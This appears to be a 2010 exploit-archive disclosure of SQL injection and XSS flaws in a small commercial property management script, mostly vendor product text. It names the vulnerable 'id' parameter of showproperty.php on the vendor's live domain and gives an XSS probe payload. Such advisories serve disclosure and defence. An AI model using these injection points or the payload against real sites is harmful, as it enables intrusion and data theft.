Simple to Use Property Management System SQLi & XSS Vuln
Posted on 09 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Simple to Use Property Management System SQLi & XSS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================= Simple to Use Property Management System SQLi & XSS Vulnerability ================================================================= Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com] Exploit Title: Simple to Use Property Management System SQLi & XSS Vulnerability Version:n/a Platform:Linux, Windows Price:12$ Vendor url:http://mypropertysite.biz Published: 2010-06-09 Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue??, S1ayer,d3c0d3r and to all ICW members ##################################################################################################################################################################################################### Description: The system is hosted on my server and you will be given unlimited support either by telephone, email or using Crossloop the live support? tool. This property management system will allow you to add unlimited properties to you site plus unlimited pages very easily using your home or office PC. You can add unlimited pictures to each listing and also the images are resized while being uploaded. All images are watermarked with your logo so anyone lifting them off the site cant use them without showing off your logo. The system allows you to add and edit locations ie suburbs plus you can add any type of property you need and it is all done very easily using the passworded admin section. I have built this system with the advise of people who own my previous property management systems. ####################################################################################################################################################################################################### Vulnerability: *SQLi Vulnerability DEMO URL :http://mypropertysite.biz/showproperty.php?id=[SQLi] *XSS Vulnerability Pattern:'"--><script>alert(0x000872)</script> DEMO URL :http://mypropertysite.biz/showproperty.php?id=[XSS] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
